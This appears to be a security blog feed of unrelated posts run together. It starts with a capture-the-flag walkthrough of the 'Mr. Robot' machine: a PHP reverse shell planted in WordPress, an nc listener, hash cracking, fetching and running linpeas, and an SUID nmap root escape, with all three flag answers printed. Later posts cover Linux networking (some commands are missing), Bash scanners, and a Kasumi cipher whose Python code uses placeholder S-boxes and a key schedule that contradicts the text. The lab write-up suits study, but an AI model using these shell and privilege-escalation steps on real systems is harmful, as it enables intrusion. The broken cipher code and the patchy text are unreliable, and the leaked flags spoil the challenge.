I personally felt like it was not just a simple room but a kinda crash course of using tools used for WebEx.

Most Important learning from this machine: Most systems don’t break from Brute-force, they break from overlooked configs

Walkthrough

Nmap Scan:

┌──(kali㉿kali)-[~/Downloads]
└─$ nmap -sC -sV -Pn -v 10.10.209.231
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-04-07 04:36 IST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:36
Completed Parallel DNS resolution of 1 host. at 04:36, 0.10s elapsed
Initiating Connect Scan at 04:36
Scanning 10.10.209.231 [1000 ports]
Discovered open port 443/tcp on 10.10.209.231
Discovered open port 80/tcp on 10.10.209.231
Completed Connect Scan at 04:36, 15.98s elapsed (1000 total ports)
Initiating Service scan at 04:36
Scanning 2 services on 10.10.209.231
Completed Service scan at 04:36, 13.56s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.209.231.
Initiating NSE at 04:36
Completed NSE at 04:36, 8.48s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 1.60s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Nmap scan report for 10.10.209.231
Host is up (0.23s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after:  2025-09-13T10:45:03
| MD5:   3c16:3b19:87c3:42ad:6634:c1c9:d0aa:fb97
|_SHA-1: ef0c:5fa5:931a:09a5:687c:a2c2:80c4:c792:07ce:f71b
|_http-server-header: Apache
|_http-title: 400 Bad Request
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E

NSE: Script Post-scanning.
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Initiating NSE at 04:36
Completed NSE at 04:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 39.87 seconds

Looking at the result of nmap scan, port 22 ssh is closed. Port 80 http is up and running Apache http. Also port 443 is up.

Now visiting the ip in browser:

I recommend trying all the comands given, even if it’s not useful. try diging may be can find some easier method.

Then I tried gobuster:

gobuster dir --url <http://10.10.209.231/> -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

===============================================================
/images (Status: 301)
/video (Status: 301)
/rss (Status: 301)
/image (Status: 301)
/blog (Status: 301)
/0 (Status: 301)
/audio (Status: 301)
/sitemap (Status: 200)
/admin (Status: 301)
/feed (Status: 301)
/robots (Status: 200)
/dashboard (Status: 302)
/login (Status: 302)
/phpmyadmin (Status: 403)
/intro (Status: 200)
/license (Status: 200)
/wp-content (Status: 301)
/css (Status: 301)
/js (Status: 301)

As per the result and hint provided, I am interested more in the robots page. And yes, I contained the first key(flag)

we have fsocity.dic and key-1-of-3.txt listed under /robots. And going into /key-1-of-3.txt reveals the 1st key of the challange.

🚩073403c8a58a1f80d943455fb30724b9

fsocity.dic contains the list of usernames and password that we can use to bruteforce the admin login of the wordpress site

/wp-login.php reveals us login panel of wordpress.

We have a set of usernames and password, shall we try BruteForceing it ???

We have got an /license page also. Let’s try

We got an base64 encoded string right here. Let’s decrypt

Here we got the login username and password Let’s login

we have access to wordpress dashboard.

What to do next?

Our best step would be to inject or replace the php file to malicious one. So that when the website runs the php we get ourself reverse shell.

For this i will be using php reverse shell from pentestmonkey https://github.com/pentestmonkey/php-reverse-shell

Replace with malicious code and change the IP Address and port. Next, run netcat and visit the 404 page.

nc -lvnp 1234

listening on [any] 1243 ...
connect to [10.9.12.198] from (UNKNOWN) [10.10.121.252] 37394
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 19:03:27 up 46 min, 0 users, load average: 0.05, 0.06, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
bash: cannot set terminal process group (1998): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/$ cd /home/robot
daemon@linux:/home/robot$ ls
key-2-of-3.txt
password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

looking at the home directory of robot user. We can see to files.

key-2-of-3.txt and password.raw-md5

we don’t have access to key-2-of-3.txt but we can read password.raw-md5reading the password file reveals what looks like username and md5 encrypted password.

the decode password. Now lets login with the user robot

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ whoami
whoami
robot
robot@linux:~

robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

🚩073403c8a58a1f80d943455fb30724b9

Now for 3rd flag, it was necessary to perform privilege escalation to gain root access and open the root flag. On my Kali Linux, I downloaded linpeas, launched a web server, and downloaded linpeas.sh to the server.

wget <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh>

python3 -m http.server

wget 10.10.33.211:8000/linpeas.sh

./linpeas.sh

SUID - Check easy privesc, exploits and write perms
...
-rwsr-xr-x 1 root root 493K Nov 13  2015 /usr/local/bin/nmap
...

With linpeas, I discovered that nmap could be exploited. Following a guide on GTFOBins, I found out how to exploit nmap for sudo privileges, became root, and obtained the root flag.

GFOBin -> https://gtfobins.github.io/gtfobins/nmap/#sudo

robot@linux:/tmp$ nmap --interactive

Starting nmap V. 3.81 ( <http://www.insecure.org/nmap/> )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh

whoami
root

cd /root

ls
firstboot_done key-3-of-3.txt

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

🚩04787ddef27c3dee1ee161b21670b4e4

The ability to analyze and manipulate network configurations is crucial for ethical hackers, penetration testers, and cybersecurity professionals. Linux provides powerful built-in tools for examining and modifying network settings, including ifconfig, iwconfig, and dig. In this article, we explore these tools and their role in DNS manipulation.

1. Examining Network Interfaces with ifconfig & iwconfig

ifconfig: Inspecting and Configuring Network Interfaces

The ifconfig command provides detailed information about active network interfaces, including:

• IP addresses
• MAC addresses
• Broadcast addresses
• Network masks

To view all network interfaces:

To check a specific interface, e.g., eth0:

iwconfig: Wireless Network Configuration

Unlike ifconfig, which handles wired connections, iwconfig is used for wireless network interfaces. It displays:

• Wireless modes (Managed, Monitor)
• Signal strength
• IEEE standards support

2. Modifying Network Settings

Changing IP Address

To manually set an IP address for a network interface:

Setting Netmask and Broadcast Address

Spoofing MAC Address

Changing your MAC address can help in anonymity and bypassing network restrictions:

Obtaining a New IP from DHCP

To request a new IP address from the DHCP server:

3. Manipulating the Domain Name System (DNS)

Examining DNS Records with dig

The dig command allows ethical hackers to extract key DNS records.

• Get Nameserver (NS) Information:

• Get Mail Exchange (MX) Information:

Changing DNS Server

Sometimes, you may want to override the default DNS server. This can be done by modifying the /etc/resolv.conf file:

This command directs all DNS queries to Google’s public DNS.

4. Mapping Custom IPs Using /etc/hosts

Linux provides an alternative method for domain name resolution using the /etc/hosts file. You can manually map domain names to specific IP addresses.

To edit the hosts file:

Conclusion

Understanding Linux networking tools and DNS manipulation is essential for security professionals. Whether analyzing networks with ifconfig, modifying DNS records with dig, or overriding IP mappings with /etc/hosts, mastering these tools provides valuable insights into network security and hacking techniques. Stay ethical, and use these skills responsibly!

Kasumi is a block cipher that operates on:

• Block Size: 64 bits (8 bytes)
• Key Size: 128 bits (16 bytes)
• Structure: 8-round Feistel network

It was standardized in 1999 by the 3GPP as part of the UMTS (Universal Mobile Telecommunications System) security architecture, where it serves as the core of the confidentiality algorithm (f8) and integrity algorithm (f9). The name “Kasumi” means “mist” in Japanese, reflecting its heritage from MISTY1, but it’s optimized for hardware implementation and lightweight performance.

Kasumi’s design balances security, speed, and resource efficiency, making it ideal for constrained environments like mobile devices. It uses a Feistel structure, a common approach in block ciphers (e.g., DES), but enhances it with complex key-dependent functions to resist cryptanalysis.

Structure of Kasumi

Kasumi employs an 8-round Feistel network, where the 64-bit plaintext is split into two 32-bit halves (Left and Right), and each round transforms these halves using a round function and subkeys. Unlike a pure Feistel cipher, Kasumi alternates between two types of round functions depending on whether the round number is odd or even:

• Odd Rounds: Apply the FL (Function Linear) followed by the FO (Function Outer).
• Even Rounds: Apply the FO function followed by the FL function.

This alternating structure enhances diffusion and confusion, key principles of secure cipher design (as per Shannon’s criteria).

Key Components

Kasumi’s operation relies on three main functions and a key schedule:

1. FL (Function Linear): A linear transformation that mixes the data with subkeys.
2. FO (Function Outer): A three-round function that introduces non-linearity and key mixing.
3. FI (Function Inner): A substitution-permutation function at the core of FO, using S-boxes.
4. Key Schedule: Generates round-specific subkeys from the 128-bit master key.

Let’s explore each in detail

Detailed Components

1. FL (Function Linear)

Input: 32 bits

Subkeys: Two 16-bit subkeys (KLᵢ₁, KLᵢ₂)

Operation:

• Split the 32-bit input into two 16-bit halves: L (left) and R (right).
• Compute:
• R’ = R ⊕ ROL(L ∧ KLᵢ₁, 1)
• L’ = L ⊕ ROL(R’ ∧ KLᵢ₂, 1)

Output: Concatenate L’ and R’ (32 bits).

Purpose: Provides linear mixing with key material, enhancing diffusion.

Here, ⊕ is XOR, ∧ is AND, and ROL(x, n) is a left rotation of x by n bits. The FL function is invertible and lightweight, making it efficient for hardware.

2. FO (Function Outer)

Input: 32 bits

Subkeys: Three 16-bit KO subkeys (KOᵢ₁, KOᵢ₂, KOᵢ₃) and three 16-bit KI subkeys (KIᵢ₁, KIᵢ₂, KIᵢ₃)

Operation:

• Split the 32-bit input into two 16-bit halves: L₀ (left) and R₀ (right).
• Perform three iterations (j = 1 to 3):
• Rⱼ = FI(Lⱼ₋₁ ⊕ KOᵢⱼ, KIᵢⱼ) ⊕ Rⱼ₋₁
• Lⱼ = Rⱼ₋₁
• Output: Concatenate L₃ and R₃ (32 bits).

Purpose: Introduces non-linearity and deeper key mixing through the FI function.

FO acts as a mini-Feistel network within each round, running three sub-rounds to ensure thorough transformation.

3. FI (Function Inner)

Input: 16 bits

Subkey: One 16-bit KI subkey

Operation:

• Split the 16-bit input into 9-bit left (L) and 7-bit right (R) parts.
• Apply two S-boxes:
• S9: Maps 9 bits to 9 bits (512-entry table)
• S7: Maps 7 bits to 7 bits (128-entry table)
• Compute:
• ZE(R): Zero-extend R to 9 bits.
• TR(L): Truncate L to 7 bits.
• First stage:
• L₁ = S9(L) ⊕ ZE(R)
• R₁ = S7(R) ⊕ TR(L)
• Mix with subkey (split into 7-bit KI₇ and 9-bit KI₉):
• L₂ = L₁ ⊕ KI₉
• R₂ = R₁ ⊕ KI₇
• Second stage:
• L₃ = S9(L₂) ⊕ ZE(R₂)
• R₃ = S7(R₂) ⊕ TR(L₂)
• Output: Concatenate L₃ (9 bits) and R₃ (7 bits) to form 16 bits.

Purpose: Provides the primary source of non-linearity through S-box lookups.

The S9 and S7 tables are predefined, cryptographically strong substitution boxes designed to resist linear and differential cryptanalysis.

4. Key Schedule

Input: 128-bit master key

Process:

• Split the 128-bit key into eight 16-bit words: K₁, K₂, …, K₈.
• Define a constant array C = [0x0123, 0x4567, 0x89AB, 0xCDEF, 0xFEDC, 0xBA98, 0x7654, 0x3210].
• For each round i (1 to 8):
• KLᵢ₁ = ROL(Kᵢ, 0) ⊕ Cᵢ
• KLᵢ₂ = ROL(Kᵢ₊₂ mod 8, 5)
• KOᵢ₁ = ROL(Kᵢ₊₁ mod 8, 8)
• KOᵢ₂ = ROL(Kᵢ₊₅ mod 8, 15)
• KOᵢ₃ = ROL(Kᵢ₊₃ mod 8, 13)
• KIᵢ₁ = Kᵢ₊₇ mod 8
• KIᵢ₂ = Kᵢ₊₄ mod 8
• KIᵢ₃ = Kᵢ₊₆ mod 8

Output: Subkeys KL, KO, and KI for each of the 8 rounds.

Purpose: Ensures each round uses unique key material, preventing related-key attacks.

The rotations and XORs with constants make the subkeys diverse and unpredictable.

Encryption Process

Given a 64-bit plaintext and 128-bit key:

Initialization:

• Split plaintext into L₀ (left 32 bits) and R₀ (right 32 bits).
• Generate subkeys using the key schedule.

8 Rounds:

• For round i = 1 to 8:
• If i is odd:
• Temp = FL(Lᵢ₋₁, KLᵢ)
• Lᵢ = Rᵢ₋₁ ⊕ FO(Temp, KOᵢ, KIᵢ)
• Rᵢ = Lᵢ₋₁
• If i is even:
• Temp = FO(Lᵢ₋₁, KOᵢ, KIᵢ)
• Lᵢ = Rᵢ₋₁ ⊕ FL(Temp, KLᵢ)
• Rᵢ = Lᵢ₋₁

Output:

• Ciphertext = L₈ || R₈ (64 bits).

Decryption is identical except the subkeys are applied in reverse order (round 8 to 1).

Implementation using Python

def rol(x, n):
    return ((x << n) & 0xffff) | (x >> (16 - n))

def kasumi_fi(fi_in, subkey):
    left = fi_in >> 7
    right = fi_in & 0x7f
    
    s9 = [0x1b, 0x32, 0x64, 0xc8]  
    s7 = [0x0d, 0x1a, 0x34, 0x68]  
    
    temp = left ^ (s9[right % len(s9)] & 0x1ff)
    right = right ^ (s7[temp % len(s7)] & 0x7f)
    left = temp & 0x1ff
    
    return (left << 7) | right

def kasumi_fo(fo_in, koi, kii):
    left = fo_in >> 16
    right = fo_in & 0xffff
    
    for i in range(3):
        temp = right ^ koi[i]
        right = left ^ kasumi_fi(temp, kii[i])
        left = temp
    
    return (left << 16) | right

def kasumi_encrypt(block, key):
    if isinstance(key, list) and len(key) == 8:
        k = key
    else:
        k = [(key >> (i * 16)) & 0xffff for i in range(8)][::-1]
    
    kl = [0] * 8
    ko = [0] * 8
    ki = [0] * 8
    
    for i in range(8):
        kl[i] = rol(k[i % 8], i)
        ko[i] = rol(k[(i + 2) % 8], 5)
        ki[i] = rol(k[(i + 4) % 8], 13)

    left = block >> 32
    right = block & 0xffffffff
    
    for i in range(8):
        koi = [ko[(i + j) % 8] for j in range(3)]
        kii = [ki[(i + j) % 8] for j in range(3)]
        
        if i % 2 == 0:
            temp = left ^ kl[i]
            left = right ^ kasumi_fo(temp, koi, kii)
            right = temp
        else:
            temp = left ^ kasumi_fo(right, koi, kii)
            left = right
            right = temp
    
    return (left << 32) | right

def get_user_input():
    while True:
        try:
           
            plaintext_input = input("Enter plaintext (hex, 16 digits, e.g., 0123456789ABCDEF): ")
            plaintext = int(plaintext_input, 16)
            if plaintext.bit_length() > 64:
                print("Error: Plaintext must be 64 bits or less")
                continue
            
           
            key_input = input("Enter key (hex, 32 digits, e.g., 123456789ABCDEF0FEDCBA9876543210): ")
            key_int = int(key_input, 16)
            if key_int.bit_length() > 128:
                print("Error: Key must be 128 bits or less")
                continue
            key = [(key_int >> (i * 16)) & 0xffff for i in range(8)][::-1]
            return plaintext, key
            
        except ValueError:
            print("Error: Please enter valid hexadecimal numbers")
        except Exception as e:
            print(f"Error: {e}")

if __name__ == "__main__":
    print("Kasumi Encryption Program")
    print("------------------------")
    
    plaintext, key = get_user_input()
    ciphertext = kasumi_encrypt(plaintext, key)
    
    print("\nResults:")
    print(f"Plaintext:  {hex(plaintext)}")
    print(f"Key:        {''.join([hex(k)[2:].zfill(4) for k in key[::-1]])}")
    print(f"Ciphertext: {hex(ciphertext)}")

Cryptographic Properties

• Security: Kasumi offers 128-bit key strength, though its 64-bit block size makes it vulnerable to birthday attacks in high-data scenarios (²³² blocks). It resists linear and differential cryptanalysis due to its S-boxes and round structure.
• Efficiency: Optimized for 16-bit operations, making it suitable for hardware and low-power devices.
• Diffusion: Achieved through FL and FO, ensuring each bit change affects many others.
• Confusion: Provided by FI’s S-boxes, obscuring the relationship between plaintext, key, and ciphertext.

Applications and Significance

Kasumi is integral to:

• UMTS Security: Used in f8 (confidentiality) and f9 (integrity) algorithms.
• GSM Evolution: Adapted for A5/3 in 2G networks.

While newer standards like AES have largely superseded it in modern systems, Kasumi remains a benchmark for lightweight cryptography and a case study in cipher design.

Limitations

• Block Size: 64 bits is small by today’s standards, risking collisions in large datasets.
• Cryptanalysis: While secure, theoretical attacks (e.g., impossible differential cryptanalysis) reduce its effective security slightly below 128 bits.
• Legacy: Primarily tied to 3G, less relevant in 4G/5G contexts using AES.

Conclusion

Kasumi is a masterclass in balancing security and efficiency. Its Feistel structure, enriched with FL, FO, and FI functions, demonstrates how complex transformations can be built from simple operations. Understanding Kasumi not only illuminates mobile security’s history but also provides a foundation for studying modern cryptographic techniques. Whether implemented in Python for learning or analyzed for its design, Kasumi remains a fascinating subject in the world of cryptography.

Bash scripting is an essential skill for anyone interested in ethical hacking, penetration testing, or cybersecurity. Whether you’re a beginner looking to automate tasks or an aspiring hacker wanting to understand how scripts are used in real-world attacks, this guide will help you get started with Bash scripting and writing your own hacking scripts.

Running Your First Bash Script

To begin with, let’s create and run a simple Bash script.

1. Open a terminal in Kali Linux.
2. Create a new file using a text editor, such as nano:

nano HelloHackersArise

3. Add the following content to your script:

#! /bin/bash
echo "Hello, Hackers-Arise!"

4. Save and exit the editor (press CTRL+X, then Y, and hit Enter).

5. Give the script execute permissions:

chmod +x HelloHackersArise

6. Run the script:

./HelloHackersArise

If everything works, you should see:

Hello, Hackers-Arise!

Congratulations! You just executed your first Bash script. 🎉

Adding Variables and User Input to Scripts

Let’s add some functionality to our script by introducing variables and user input.

1. Open a new script file:

nano WelcomeScript.sh

2. Add the following code:

#! /bin/bash
echo "What is your name?"
read name
echo "What chapter are you on in Linux Basics for Hackers?"
read chapter
echo "Welcome $name to Chapter $chapter of Linux Basics for Hackers!"

3. Save, exit, and give execute permissions:

chmod +x WelcomeScript.sh

4. Run the script:

./WelcomeScript.sh

5. The script will prompt you for inputs and return a personalized message:

Enter your name: John
What chapter are you on? 5
Welcome John to Chapter 5 of Linux Basics for Hackers!

This simple script demonstrates how to use variables and user input in Bash scripting.

Your First Hacker Script: Scanning for Open Ports

Now, let’s move to some real-world hacking applications by creating a port scanner using Bash. This script will use nmap, a powerful network scanning tool available in Kali Linux.

Understanding nmap

The basic syntax of nmap is:

nmap <type of scan> <target IP> <optional: target port>

For example, scanning a system for open ports:

nmap -sT 192.168.181.1

To scan a specific port (e.g., MySQL’s default port 3306):

nmap -sT 192.168.181.1 -p 3306

Writing a Simple Port Scanner

1. Open a new script file:

nano MySQLscanner.sh

2. Add the following code:

#! /bin/bash
# This script scans for MySQL servers on a local network
nmap -sT 192.168.181.0/24 -p 3306 >/dev/null -oG MySQLscan
cat MySQLscan | grep open > MySQLscan2
cat MySQLscan2

3. Save, exit, and give execute permissions:

chmod +x MySQLscanner.sh

4. Run the script:

./MySQLscanner.sh

If successful, it will return IP addresses of systems with MySQL running:

Host: 192.168.181.69 () Ports: 3306/open/tcp//mysql///

Advanced Port Scanner with User Input

To make our script more dynamic, let’s allow users to specify IP ranges and ports.

1. Open a new script:

nano MySQLscannerAdvanced.sh

2. Add the following code:

#! /bin/bash
echo "Enter the starting IP address : "
read FirstIP
echo "Enter the last octet of the last IP address : "
read LastOctetIP
echo "Enter the port number you want to scan for : "
read port
nmap -sT $FirstIP-$LastOctetIP -p $port >/dev/null -oG MySQLscan
cat MySQLscan | grep open > MySQLscan2
cat MySQLscan2

3. Save, exit, and grant execute permissions:

chmod +x MySQLscannerAdvanced.sh

4. Run the script:

./MySQLscannerAdvanced.sh

5. The script will prompt you for input:

Enter the starting IP address: 192.168.1.1
Enter the last octet of the last IP address: 255
Enter the port number you want to scan for: 3306

1. It will return systems with the specified port open.

Essential Bash Commands for Hacking

Here are some built-in Bash commands useful for scripting:

cd Changes directory

echo Displays text on the screen

read Reads user input

pwd Prints the current directory

jobs Lists background processes

trap Captures signals (e.g., Ctrl+C)

type Displays how a command will be interpreted

export Makes a variable available to child processes

wait Waits for background processes to complete

Understanding these commands will help you write more powerful Bash scripts for automation and security testing.

Conclusion

Bash scripting is a powerful tool for ethical hacking and cybersecurity. From simple automation to advanced penetration testing scripts, mastering Bash can significantly improve your efficiency as a hacker or security professional.

In this guide, we covered: ✅ Writing a basic Bash script ✅ Using variables and user input ✅ Building a simple port scanner ✅ Creating an advanced scanning script with user-defined inputs ✅ Essential Bash commands for hacking

Now it’s time for you to experiment and enhance your skills. Try modifying these scripts, scanning different ports, and automating more security tasks.

If the version of Kali Linux you’re using doesn’t come preinstalled with Snort, you can download the files from the Kali repository by entering apt-get install snort.

When working with configuration files like snort.conf, managing and navigating large text files efficiently is crucial. This article explores essential Linux commands such as cat, head, tail, nl, grep, sed, more, and less to help streamline text file operations.

Basic File Display: The cat Command

The cat (concatenate) command is the simplest way to display a file’s content. However, it displays everything at once, which can be overwhelming for large files.

cat /etc/snort/snort.conf

While useful for small files, cat lacks navigation controls, making it less practical for handling extensive configurations.

Viewing Specific Sections with head and tail

Displaying the Beginning of a File with head

To view the first few lines of a file, use the head command. By default, it shows the first 10 lines:

head /etc/snort/snort.conf

To display a specific number of lines, such as the first 20 lines:

head -20 /etc/snort/snort.conf

Viewing the End of a File with tail

Conversely, tail shows the last 10 lines of a file:

tail /etc/snort/snort.conf

To view the last 20 lines, use:

tail -20 /etc/snort/snort.conf

These commands help inspect configuration headers and rule inclusions efficiently.

Adding Line Numbers with nl

For large files, line numbers can be beneficial. The nl command displays line numbers alongside file contents:

nl /etc/snort/snort.conf

This makes it easier to reference specific lines, especially in files exceeding 600+ lines like snort.conf.

Filtering Output with grep

The grep command searches for specific keywords within a file. For example, to find occurrences of "output" in snort.conf:

grep output /etc/snort/snort.conf

To combine it with cat for a filtered display:

cat /etc/snort/snort.conf | grep output

This highlights all lines containing the keyword “output”, making it easy to locate relevant sections.

Advanced Filtering Challenge

To display five lines before a specific keyword like “# Step #6: Configure output plugins”:

grep -B 5 "# Step #6: Configure output plugins" /etc/snort/snort.conf | head -n 5

Find and Replace with sed

The sed (stream editor) command enables search-and-replace operations. To replace all occurrences of "mysql" with "MySQL":

sed 's/mysql/MySQL/g' /etc/snort/snort.conf > snort2.conf

• The s/mysql/MySQL/g syntax replaces all instances.
• The output is saved in snort2.conf.

To replace only the first occurrence per line:

sed 's/mysql/MySQL/' /etc/snort/snort.conf > snort2.conf

To replace only the second occurrence:

sed 's/mysql/MySQL/2' /etc/snort/snort.conf > snort2.conf

These techniques help automate configuration edits efficiently.

Efficient File Viewing with more and less

Using more for Paginated Viewing

The more command allows you to view files one page at a time:

more /etc/snort/snort.conf

• Press Enter to scroll line by line.
• Press Space to scroll page by page.
• Press q to quit.

Navigating with less

The less command provides additional functionality:

less /etc/snort/snort.conf

• Scroll up and down using arrow keys.
• Search within the file by pressing /keyword.
• Jump to the next match with n.
• Exit with q.

Example: Searching for “output” in snort.conf

/output

This highlights the first match, allowing quick navigation through configuration settings.

Takeaway: less is more powerful, hence the saying: "less is more." 🚀

Conclusion

Mastering these Linux commands improves efficiency when handling large configuration files like snort.conf. Whether you need to view, search, filter, edit, or navigate through text files, the tools discussed provide powerful solutions for cybersecurity professionals and system administrators alike.

Using the cat Command in Linux: Create, View, Append, and Overwrite Files

The cat command in Linux is commonly used to display file contents, but it also allows users to create, append, and overwrite files using redirection operators (> and >>).

1. Creating a New File

To create a file, use:

cat > filename

This enters interactive mode, allowing you to type content. Press CTRL+D to save and exit.

2. Viewing File Contents

To display the file contents, use:

cat filename

3. Appending to a File

To add new content without overwriting existing data, use:

cat >> filename

This enters interactive mode again, allowing additional content to be entered.

4. Overwriting a File

Using a single > instead of >> will erase previous content before saving new data:

cat > filename

By understanding these simple cat commands, users can efficiently manage text files in Linux.

File Creation with touch

The touch command in Linux is primarily used to update a file's timestamps but can also create a new file if it doesn’t already exist. To create an empty file, use:

touch filename

For example:

touch newfile

This creates newfile, which initially has a size of 0 since no content is added. You can verify its existence using ls -l

Creating a Directory in Linux

The mkdir command (short for make directory) is used to create new directories. To create a directory named newdirectory, use:

mkdir newdirectory

To navigate into the newly created directory, use:

cd newdirectory

This allows users to organize files efficiently within the Linux filesystem.

Copying a File in Linux

The cp command is used to copy files while keeping the original intact. To create and copy a file:

touch oldfile  
cp oldfile /root/newdirectory/newfile

This copies oldfile to /root/newdirectory and renames it to newfile. If no new name is specified, the file retains its original name. Using ls inside newdirectory confirms the copied file's presence.

Renaming a File in Linux

Linux does not have a dedicated rename command, but the mv (move) command can be used for renaming files and directories.

To rename a file:

mv newfile newfile2

After running ls, you'll see newfile2 instead of newfile, confirming the rename. The same method applies to directories.

Removing a File in Linux

The rm command is used to delete files. To remove a file:

rm newfile2

After running this command, using ls will confirm that the file has been deleted.

Removing a Directory in Linux

To remove a directory, use the rmdir command:

rmdir newdirectory

However, rmdir only works on empty directories. If the directory contains files, it will return an error.

To remove a directory along with its contents, use the rm command with the -r (recursive) flag:

rm -r newdirectory

Caution: Be careful when using rm -r, as it will permanently delete all files and subdirectories within the specified directory.

1.Using locate for Fast File Searches

The locate command is one of the quickest ways to find files on a Linux system. It searches through a pre-built database rather than scanning the filesystem in real time, making it extremely fast.

How to use it:

locate <filename>

Pros and Cons of locate

✅ Extremely fast file search
✅ Finds multiple occurrences across directories
❌ The database is updated periodically (usually once a day), so newly created files may not appear immediately
❌ It might return too many results, making it harder to find the exact file you need

If locate doesn’t find a recently created file, you can manually update the database using:

sudo updatedb

2.Finding Binaries and Man Pages with whereis

If you’re looking for a binary file and its associated documentation, whereis is the best option. It returns the location of the binary, source, and manual pages if available.

Usage:

whereis <command>

Pros and Cons of whereis

✅ Returns only relevant locations (binary and documentation)
✅ More efficient than locate when searching for commands
❌ Doesn’t show every instance of a filename

3. Locating Installed Programs with which

The which command specifically searches for executable files in the directories listed in the PATH environment variable. The PATH variable contains directories where Linux looks for commands when executed.

Usage:

which <command>

Pros and Cons of which

✅ Finds only executable programs
✅ Searches directories in PATH, avoiding unnecessary results
❌ Cannot find non-executable files

The directories included in PATH typically include /usr/bin, /usr/sbin, and a few others, depending on the system configuration.

4. Performing Real-Time Searches with find

The find command is one of the most powerful and flexible search utilities in Linux. Unlike other search tools, find allows users to locate files based on multiple parameters, including filename, creation or modification date, ownership, permissions, and file size. This makes it an essential command for system administrators and power users alike.

Basic Syntax of find

The general syntax of the find command is:

find <directory> <options> <expression>

• <directory> – The starting point for the search.
• <options> – Criteria such as file type or name.
• <expression> – The specific parameter defining what you’re searching for.

Finding Files by Name

To search for a file named <filename> starting from the root (/) directory, use:

find / -type f -name <filename>

Breaking Down the Command:

• / – Starts the search from the root directory.
• -type f – Searches for ordinary files (not directories).
• -name <filename>– Looks for a file with the exact name <filename>.

Pros and Cons of find

✅ Searches in real time
✅ Supports advanced filters
❌ Can be slow on large directories

5.Efficiently Filtering Output with grep in Linux

When working with the Linux command line, you’ll often need to search for specific keywords within large amounts of text. The grep command is an essential tool for filtering output and finding relevant information quickly

What is grep?

The grep command allows users to search for patterns within files or command outputs. It is particularly useful when used in combination with other commands via piping (|), which allows the output of one command to be passed as input to another.

Using grep Effectively

Here are some ways to enhance your searches with grep:

✅ Case-Insensitive Search: Use -i to ignore case.

grep -i "error" /var/log/syslog

✅ Exact Word Match: Use -w to match whole words.

grep -w "failed" authentication.log

✅ Finding Lines That Don’t Match a Pattern: Use -v to exclude results containing a specific keyword.

grep -v "warning" logs.txt

✅ Searching Recursively in Directories: Use -r to search in files within a directory.

grep -r "password" /etc/

This will scan all files in /etc/ for the word password.

https://buymeacoffee.com/intel_ears